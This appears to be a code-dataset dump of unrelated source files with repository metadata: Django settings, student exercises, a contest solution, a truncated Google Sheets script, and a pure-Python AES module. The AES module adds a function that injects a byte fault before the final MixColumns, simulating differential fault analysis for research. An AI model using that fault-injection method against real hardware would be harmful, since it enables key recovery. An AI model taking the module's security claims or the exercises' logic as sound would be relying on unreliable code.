ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"users",
"graphene_django",
"graphql_jwt.refresh_token.apps.RefreshTokenConfig",
"graphql_auth",
"django_filters",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "quickstart.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
WSGI_APPLICATION = "quickstart.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = "/static/"
GRAPHENE = {
"SCHEMA": "quickstart.schema.schema",
"MIDDLEWARE": ["graphql_jwt.middleware.JSONWebTokenMiddleware"],
}
AUTHENTICATION_BACKENDS = [
"graphql_auth.backends.GraphQLAuthBackend",
"django.contrib.auth.backends.ModelBackend",
]
GRAPHQL_JWT = {
"JWT_VERIFY_EXPIRATION": True,
"JWT_LONG_RUNNING_REFRESH_TOKEN": True,
"JWT_ALLOW_ANY_CLASSES": [
"graphql_auth.mutations.Register",
"graphql_auth.mutations.VerifyAccount",
"graphql_auth.mutations.ResendActivationEmail",
"graphql_auth.mutations.SendPasswordResetEmail",
"graphql_auth.mutations.PasswordReset",
"graphql_auth.mutations.ObtainJSONWebToken",
"graphql_auth.mutations.VerifyToken",
"graphql_auth.mutations.RefreshToken",
"graphql_auth.mutations.RevokeToken",
"graphql_auth.mutations.VerifySecondaryEmail",
],
}
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
AUTH_USER_MODEL = "users.CustomUser"
| [
"pedrobermoreira@gmail.com"
] | pedrobermoreira@gmail.com |
6d594e11da8a7b220ea7286f7fb5b4a2a98c0b15 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/16/usersdata/78/6015/submittedfiles/triangulo.py | 8f53086208c10d248c43bc38a441462edf00389a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
a=input('digite o valor de a:')
b=input('digite o valor de b:')
c=input('digite o valor de c:')
if a>=b>=c>0:
print('s')
if a>b+c:
print('n')
if a**2==(b**2)+(c**2):
print('Re')
if a**2>(b**2)+(c**2):
print('Ob')
if a**2<(b**2)+(c**2):
print('Ac')
if a==b==c:
print('Eq')
if b==c!=a:
print('Is')
if a!=b!=c:
print('Es')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
2095f914ce3e96225e455108732ef0798ef5a742 | 241703a2ca81bcc2b08084bf5ea2fe7415bcbfc6 | /Tasks/Chernikova/5.py | 05385ca5a3dd0ced7af41c54184ea34aad7d277f | [] | no_license | PolinaChepolina/testRepo | 58a41df5ce88b98e5ff36ab0745d7694a4c57ce1 | 467888b8f7b7578d015ca5282929f4f119ac469b | refs/heads/master | 2020-05-23T18:03:20.899621 | 2019-08-04T10:56:47 | 2019-08-04T10:56:47 | 186,879,773 | 0 | 0 | null | 2019-07-12T21:36:49 | 2019-05-15T18:11:18 | null | UTF-8 | Python | false | false | 379 | py | Python 3.7.4 (v3.7.4:e09359112e, Jul 8 2019, 14:36:03)
[GCC 4.2.1 (Apple Inc. build 5666) (dot 3)] on darwin
Type "help", "copyright", "credits" or "license()" for more information.
>>>
=============================== RESTART: Shell ===============================
>>> a= int(input())
b = int(input())
l= int(input())
N = int(input())
print( (N-1)*2*b + a*(2*(N-1) +1) + 2*l)
| [
"p.chernikova@yandex.ru"
] | p.chernikova@yandex.ru |
26662c1be78015bae5c1bac4ae4b837575802df0 | 2368f31ff2b537aeba3f0fdddd13b02cc409ad96 | /aes.py | 3ead499c32ec34972368894b1c9d0a5b8980c584 | [] | no_license | balayette/fault | 163c53bdb00560194da16df1becaba309e88fce3 | 2cd0b262b58ab574a179fe015094fd7fb77af0fe | refs/heads/main | 2023-02-21T15:47:35.129674 | 2021-01-20T00:15:32 | 2021-01-20T00:15:32 | 321,193,709 | 17 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,874 | py | #!/usr/bin/env python3
import random
"""
This is an exercise in secure symmetric-key encryption, implemented in pure
Python (no external libraries needed).
Original AES-128 implementation by Bo Zhu (http://about.bozhu.me) at
https://github.com/bozhu/AES-Python . PKCS#7 padding, CBC mode, PKBDF2, HMAC,
byte array and string support added by me at https://github.com/boppreh/aes.
Other block modes contributed by @righthandabacus.
Although this is an exercise, the `encrypt` and `decrypt` functions should
provide reasonable security to encrypted messages.
"""
s_box = (
0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
)
inv_s_box = (
0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,
0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,
0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,
0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,
0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,
0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,
0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,
0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,
0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,
0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,
0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,
0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,
0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,
0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,
0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,
0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D,
)
def sub_bytes(s):
for i in range(4):
for j in range(4):
s[i][j] = s_box[s[i][j]]
def inv_sub_bytes(s):
for i in range(4):
for j in range(4):
s[i][j] = inv_s_box[s[i][j]]
def shift_rows(s):
s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]
def inv_shift_rows(s):
s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]
def add_round_key(s, k):
for i in range(4):
for j in range(4):
s[i][j] ^= k[i][j]
# learned from http://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c
xtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)
def mix_single_column(a):
# see Sec 4.1.2 in The Design of Rijndael
t = a[0] ^ a[1] ^ a[2] ^ a[3]
u = a[0]
a[0] ^= t ^ xtime(a[0] ^ a[1])
a[1] ^= t ^ xtime(a[1] ^ a[2])
a[2] ^= t ^ xtime(a[2] ^ a[3])
a[3] ^= t ^ xtime(a[3] ^ u)
def mix_columns(s):
for i in range(4):
mix_single_column(s[i])
def inv_mix_columns(s):
# see Sec 4.1.3 in The Design of Rijndael
for i in range(4):
u = xtime(xtime(s[i][0] ^ s[i][2]))
v = xtime(xtime(s[i][1] ^ s[i][3]))
s[i][0] ^= u
s[i][1] ^= v
s[i][2] ^= u
s[i][3] ^= v
mix_columns(s)
r_con = (
0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,
0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,
0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,
)
def bytes2matrix(text):
""" Converts a 16-byte array into a 4x4 matrix. """
return [list(text[i:i+4]) for i in range(0, len(text), 4)]
def matrix2bytes(matrix):
""" Converts a 4x4 matrix into a 16-byte array. """
return bytes(sum(matrix, []))
def xor_bytes(a, b):
""" Returns a new byte array with the elements xor'ed. """
return bytes(i^j for i, j in zip(a, b))
def inc_bytes(a):
""" Returns a new byte array with the value increment by 1 """
out = list(a)
for i in reversed(range(len(out))):
if out[i] == 0xFF:
out[i] = 0
else:
out[i] += 1
break
return bytes(out)
def pad(plaintext):
"""
Pads the given plaintext with PKCS#7 padding to a multiple of 16 bytes.
Note that if the plaintext size is a multiple of 16,
a whole block will be added.
"""
padding_len = 16 - (len(plaintext) % 16)
padding = bytes([padding_len] * padding_len)
return plaintext + padding
def unpad(plaintext):
"""
Removes a PKCS#7 padding, returning the unpadded text and ensuring the
padding was correct.
"""
padding_len = plaintext[-1]
assert padding_len > 0
message, padding = plaintext[:-padding_len], plaintext[-padding_len:]
assert all(p == padding_len for p in padding)
return message
def split_blocks(message, block_size=16, require_padding=True):
assert len(message) % block_size == 0 or not require_padding
return [message[i:i+16] for i in range(0, len(message), block_size)]
class AES:
"""
Class for AES-128 encryption with CBC mode and PKCS#7.
This is a raw implementation of AES, without key stretching or IV
management. Unless you need that, please use `encrypt` and `decrypt`.
"""
rounds_by_key_size = {16: 10, 24: 12, 32: 14}
def __init__(self, master_key):
"""
Initializes the object with a given key.
"""
assert len(master_key) in AES.rounds_by_key_size
self.n_rounds = AES.rounds_by_key_size[len(master_key)]
self._key_matrices = self._expand_key(master_key)
def _expand_key(self, master_key):
"""
Expands and returns a list of key matrices for the given master_key.
"""
# Initialize round keys with raw key material.
key_columns = bytes2matrix(master_key)
iteration_size = len(master_key) // 4
# Each iteration has exactly as many columns as the key material.
columns_per_iteration = len(key_columns)
i = 1
while len(key_columns) < (self.n_rounds + 1) * 4:
# Copy previous word.
word = list(key_columns[-1])
# Perform schedule_core once every "row".
if len(key_columns) % iteration_size == 0:
# Circular shift.
word.append(word.pop(0))
# Map to S-BOX.
word = [s_box[b] for b in word]
# XOR with first byte of R-CON, since the others bytes of R-CON are 0.
word[0] ^= r_con[i]
i += 1
elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:
# Run word through S-box in the fourth iteration when using a
# 256-bit key.
word = [s_box[b] for b in word]
# XOR with equivalent word from previous iteration.
word = xor_bytes(word, key_columns[-iteration_size])
key_columns.append(word)
# Group key words in 4x4 byte matrices.
return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]
def encrypt_block(self, plaintext):
"""
Encrypts a single block of 16 byte long plaintext.
"""
assert len(plaintext) == 16
plain_state = bytes2matrix(plaintext)
add_round_key(plain_state, self._key_matrices[0])
for i in range(1, self.n_rounds):
sub_bytes(plain_state)
shift_rows(plain_state)
mix_columns(plain_state)
add_round_key(plain_state, self._key_matrices[i])
sub_bytes(plain_state)
shift_rows(plain_state)
add_round_key(plain_state, self._key_matrices[-1])
return matrix2bytes(plain_state)
def encrypt_block_with_fault(self, plaintext, col, row, val=42):
assert len(plaintext) == 16
plain_state = bytes2matrix(plaintext)
add_round_key(plain_state, self._key_matrices[0])
for i in range(1, self.n_rounds - 1):
sub_bytes(plain_state)
shift_rows(plain_state)
mix_columns(plain_state)
add_round_key(plain_state, self._key_matrices[i])
sub_bytes(plain_state)
shift_rows(plain_state)
# inject the fault between the last two mix_columns
plain_state[col][row] = val
mix_columns(plain_state)
add_round_key(plain_state, self._key_matrices[self.n_rounds - 1])
sub_bytes(plain_state)
shift_rows(plain_state)
add_round_key(plain_state, self._key_matrices[-1])
return matrix2bytes(plain_state)
def decrypt_block(self, ciphertext):
"""
Decrypts a single block of 16 byte long ciphertext.
"""
assert len(ciphertext) == 16
cipher_state = bytes2matrix(ciphertext)
add_round_key(cipher_state, self._key_matrices[-1])
inv_shift_rows(cipher_state)
inv_sub_bytes(cipher_state)
for i in range(self.n_rounds - 1, 0, -1):
add_round_key(cipher_state, self._key_matrices[i])
inv_mix_columns(cipher_state)
inv_shift_rows(cipher_state)
inv_sub_bytes(cipher_state)
add_round_key(cipher_state, self._key_matrices[0])
return matrix2bytes(cipher_state)
def encrypt_cbc(self, plaintext, iv):
"""
Encrypts `plaintext` using CBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
plaintext = pad(plaintext)
blocks = []
previous = iv
for plaintext_block in split_blocks(plaintext):
# CBC mode encrypt: encrypt(plaintext_block XOR previous)
block = self.encrypt_block(xor_bytes(plaintext_block, previous))
blocks.append(block)
previous = block
return b''.join(blocks)
def decrypt_cbc(self, ciphertext, iv):
"""
Decrypts `ciphertext` using CBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
previous = iv
for ciphertext_block in split_blocks(ciphertext):
# CBC mode decrypt: previous XOR decrypt(ciphertext)
blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block)))
previous = ciphertext_block
return unpad(b''.join(blocks))
def encrypt_pcbc(self, plaintext, iv):
"""
Encrypts `plaintext` using PCBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
plaintext = pad(plaintext)
blocks = []
prev_ciphertext = iv
prev_plaintext = bytes(16)
for plaintext_block in split_blocks(plaintext):
# PCBC mode encrypt: encrypt(plaintext_block XOR (prev_ciphertext XOR prev_plaintext))
ciphertext_block = self.encrypt_block(xor_bytes(plaintext_block, xor_bytes(prev_ciphertext, prev_plaintext)))
blocks.append(ciphertext_block)
prev_ciphertext = ciphertext_block
prev_plaintext = plaintext_block
return b''.join(blocks)
def decrypt_pcbc(self, ciphertext, iv):
"""
Decrypts `ciphertext` using PCBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
prev_ciphertext = iv
prev_plaintext = bytes(16)
for ciphertext_block in split_blocks(ciphertext):
# PCBC mode decrypt: (prev_plaintext XOR prev_ciphertext) XOR decrypt(ciphertext_block)
plaintext_block = xor_bytes(xor_bytes(prev_ciphertext, prev_plaintext), self.decrypt_block(ciphertext_block))
blocks.append(plaintext_block)
prev_ciphertext = ciphertext_block
prev_plaintext = plaintext_block
return unpad(b''.join(blocks))
def encrypt_cfb(self, plaintext, iv):
"""
Encrypts `plaintext` with the given initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
prev_ciphertext = iv
for plaintext_block in split_blocks(plaintext, require_padding=False):
# CFB mode encrypt: plaintext_block XOR encrypt(prev_ciphertext)
ciphertext_block = xor_bytes(plaintext_block, self.encrypt_block(prev_ciphertext))
blocks.append(ciphertext_block)
prev_ciphertext = ciphertext_block
return b''.join(blocks)
def decrypt_cfb(self, ciphertext, iv):
"""
Decrypts `ciphertext` with the given initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
prev_ciphertext = iv
for ciphertext_block in split_blocks(ciphertext, require_padding=False):
# CFB mode decrypt: ciphertext XOR decrypt(prev_ciphertext)
plaintext_block = xor_bytes(ciphertext_block, self.encrypt_block(prev_ciphertext))
blocks.append(plaintext_block)
prev_ciphertext = ciphertext_block
return b''.join(blocks)
def encrypt_ofb(self, plaintext, iv):
"""
Encrypts `plaintext` using OFB mode initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
previous = iv
for plaintext_block in split_blocks(plaintext, require_padding=False):
# OFB mode encrypt: plaintext_block XOR encrypt(previous)
block = self.encrypt_block(previous)
ciphertext_block = xor_bytes(plaintext_block, block)
blocks.append(ciphertext_block)
previous = block
return b''.join(blocks)
def decrypt_ofb(self, ciphertext, iv):
"""
Decrypts `ciphertext` using OFB mode initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
previous = iv
for ciphertext_block in split_blocks(ciphertext, require_padding=False):
# OFB mode decrypt: ciphertext XOR encrypt(previous)
block = self.encrypt_block(previous)
plaintext_block = xor_bytes(ciphertext_block, block)
blocks.append(plaintext_block)
previous = block
return b''.join(blocks)
def encrypt_ctr(self, plaintext, iv):
"""
Encrypts `plaintext` using CTR mode with the given nounce/IV.
"""
assert len(iv) == 16
blocks = []
nonce = iv
for plaintext_block in split_blocks(plaintext, require_padding=False):
# CTR mode encrypt: plaintext_block XOR encrypt(nonce)
block = xor_bytes(plaintext_block, self.encrypt_block(nonce))
blocks.append(block)
nonce = inc_bytes(nonce)
return b''.join(blocks)
def decrypt_ctr(self, ciphertext, iv):
"""
Decrypts `ciphertext` using CTR mode with the given nounce/IV.
"""
assert len(iv) == 16
blocks = []
nonce = iv
for ciphertext_block in split_blocks(ciphertext, require_padding=False):
# CTR mode decrypt: ciphertext XOR encrypt(nonce)
block = xor_bytes(ciphertext_block, self.encrypt_block(nonce))
blocks.append(block)
nonce = inc_bytes(nonce)
return b''.join(blocks)
import os
from hashlib import pbkdf2_hmac
from hmac import new as new_hmac, compare_digest
AES_KEY_SIZE = 16
HMAC_KEY_SIZE = 16
IV_SIZE = 16
SALT_SIZE = 16
HMAC_SIZE = 32
def get_key_iv(password, salt, workload=100000):
"""
Stretches the password and extracts an AES key, an HMAC key and an AES
initialization vector.
"""
stretched = pbkdf2_hmac('sha256', password, salt, workload, AES_KEY_SIZE + IV_SIZE + HMAC_KEY_SIZE)
aes_key, stretched = stretched[:AES_KEY_SIZE], stretched[AES_KEY_SIZE:]
hmac_key, stretched = stretched[:HMAC_KEY_SIZE], stretched[HMAC_KEY_SIZE:]
iv = stretched[:IV_SIZE]
return aes_key, hmac_key, iv
def encrypt(key, plaintext, workload=100000):
"""
Encrypts `plaintext` with `key` using AES-128, an HMAC to verify integrity,
and PBKDF2 to stretch the given key.
The exact algorithm is specified in the module docstring.
"""
if isinstance(key, str):
key = key.encode('utf-8')
if isinstance(plaintext, str):
plaintext = plaintext.encode('utf-8')
salt = os.urandom(SALT_SIZE)
key, hmac_key, iv = get_key_iv(key, salt, workload)
ciphertext = AES(key).encrypt_cbc(plaintext, iv)
hmac = new_hmac(hmac_key, salt + ciphertext, 'sha256').digest()
assert len(hmac) == HMAC_SIZE
return hmac + salt + ciphertext
def decrypt(key, ciphertext, workload=100000):
"""
Decrypts `ciphertext` with `key` using AES-128, an HMAC to verify integrity,
and PBKDF2 to stretch the given key.
The exact algorithm is specified in the module docstring.
"""
assert len(ciphertext) % 16 == 0, "Ciphertext must be made of full 16-byte blocks."
assert len(ciphertext) >= 32, """
Ciphertext must be at least 32 bytes long (16 byte salt + 16 byte block). To
encrypt or decrypt single blocks use `AES(key).decrypt_block(ciphertext)`.
"""
if isinstance(key, str):
key = key.encode('utf-8')
hmac, ciphertext = ciphertext[:HMAC_SIZE], ciphertext[HMAC_SIZE:]
salt, ciphertext = ciphertext[:SALT_SIZE], ciphertext[SALT_SIZE:]
key, hmac_key, iv = get_key_iv(key, salt, workload)
expected_hmac = new_hmac(hmac_key, salt + ciphertext, 'sha256').digest()
assert compare_digest(hmac, expected_hmac), 'Ciphertext corrupted or tampered.'
return AES(key).decrypt_cbc(ciphertext, iv)
def benchmark():
key = b'P' * 16
message = b'M' * 16
aes = AES(key)
for i in range(30000):
aes.encrypt_block(message)
__all__ = [encrypt, decrypt, AES]
if __name__ == '__main__':
import sys
write = lambda b: sys.stdout.buffer.write(b)
read = lambda: sys.stdin.buffer.read()
if len(sys.argv) < 2:
print('Usage: ./aes.py encrypt "key" "message"')
print('Running tests...')
from tests import *
run()
elif len(sys.argv) == 2 and sys.argv[1] == 'benchmark':
benchmark()
exit()
elif len(sys.argv) == 3:
text = read()
elif len(sys.argv) > 3:
text = ' '.join(sys.argv[2:])
if 'encrypt'.startswith(sys.argv[1]):
write(encrypt(sys.argv[2], text))
elif 'decrypt'.startswith(sys.argv[1]):
write(decrypt(sys.argv[2], text))
else:
print('Expected command "encrypt" or "decrypt" in first argument.')
# encrypt('my secret key', b'0' * 1000000) # 1 MB encrypted in 20 seconds.
| [
"nmanichon@gmail.com"
] | nmanichon@gmail.com |
b74c7a408b72582b81de14ddae925d60aa364fdf | 86cf79436659ff8d69d6d7a8d9cb358f0d1b4f1c | /AOJ/0383/0383.py | 366208a7d42f41637177a43b9108f38835ec689a | [] | no_license | pombredanne/problem-solving | d96a367851a34fb4f947b3b7a95ad364cf94ea8f | fefdbfb89ba04dbcd7df93c02968759ea970db06 | refs/heads/master | 2020-05-20T12:34:23.654253 | 2019-03-31T09:57:55 | 2019-03-31T09:57:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | A,B,X = map(int, input().split())
ans = a = b = 0
if X % 500 != 0: X += 500 - X%500
if A < B:
a = X//1000 + (1 if (X%1000>0) else 0)
elif A > 2*B:
b = X//500
else:
a = X//1000; X %= 1000
b = X//500
print(A*a + B*b)
| [
"y.watanobe@gmail.com"
] | y.watanobe@gmail.com |
a5f122ebc72de3be52ef9ee2765e9425eb204b4b | 9ea73f39ce517d412343ac3c1b602ba8b2adc3ca | /run.py | 911ff07f02a4db098ff391fab8cd22aa6b9a8352 | [] | no_license | Heyson/love-sandwiches | a9739656889b74e20ea24062b34165f14f96301b | 26ba0da0cdc7e46040438ae45b957dcb6a5c4811 | refs/heads/main | 2023-08-02T10:16:10.187736 | 2021-09-18T19:25:30 | 2021-09-18T19:25:30 | 400,629,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,948 | py | import gspread
from google.oauth2.service_account import Credentials
from pprint import pprint
SCOPE = [
"https://www.googleapis.com/auth/spreadsheets",
"https://www.googleapis.com/auth/drive.file",
"https://www.googleapis.com/auth/drive"
]
CREDS = Credentials.from_service_account_file('creds.json')
SCOPED_CREDS = CREDS.with_scopes(SCOPE)
GSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)
SHEET = GSPREAD_CLIENT.open('love_sandwiches')
def get_sales_data():
"""
Get sales figures input from the user.
Run a while loop to collect a valid string of data from the user
via the terminal, which must be a string of 6 numbers separated
by commas. The loop will repeatedly request data, until it is valid.
"""
while True:
print("Please enter sales data from the last market.")
print("Data should be six numbers, separated by commas.")
print("Example: 10,20,30,40,50,60\n")
data_str = input("Enter your data here: ")
sales_data = data_str.split(",")
if validate_data(sales_data):
print("Data is valid!")
break
return sales_data
def validate_data(values):
"""
Inside the try, converts all string values into integers.
Raises ValueError if strings cannot be converted into int,
or if there aren't exactly 6 values.
"""
try:
[int(value) for value in values]
if len(values) != 6:
raise ValueError(
f"Exactly 6 values required, you provided {len(values)}"
)
except ValueError as e:
print(f"Invalid data: {e}, please try again.\n")
return False
return True
def update_worksheet(data, worksheet):
"""
Receives a list of integers to be inserted into a worksheet
Update the relevant worksheet with the data provided
"""
print(f"Updating {worksheet} worksheet...\n")
worksheet_to_update = SHEET.worksheet(worksheet)
worksheet_to_update.append_row(data)
print(f"{worksheet} worksheet updated successfully\n")
def calculate_surplus_data(sales_row):
"""
Compare sales with stock and calculate the surplus for each item type.
The surplus is defined as the sales figure subtracted from the stock:
- Positive surplus indicates waste
- Negative surplus indicates extra made when stock was sold out.
"""
print("Calculating surplus data...\n")
stock = SHEET.worksheet("stock").get_all_values()
stock_row = stock[-1]
surplus_data = []
for stock, sales in zip(stock_row, sales_row):
surplus = int(stock) - sales
surplus_data.append(surplus)
return surplus_data
def get_last_5_entries_sales():
"""
Collects columns of data from sales worksheet, collecting
the last 5 entries for each sandwich and returns the data
as a list of lists.
"""
sales = SHEET.worksheet("sales")
columns = []
for ind in range(1, 7):
column = sales.col_values(ind)
columns.append(column[-5:])
return columns
def calculate_stock_data(data):
"""
Calculate the average stock for each item type, adding 10%
"""
print("Calculating stock data...\n")
new_stock_data = []
for column in data:
int_column = [int(num) for num in column]
average = sum(int_column) / len(int_column)
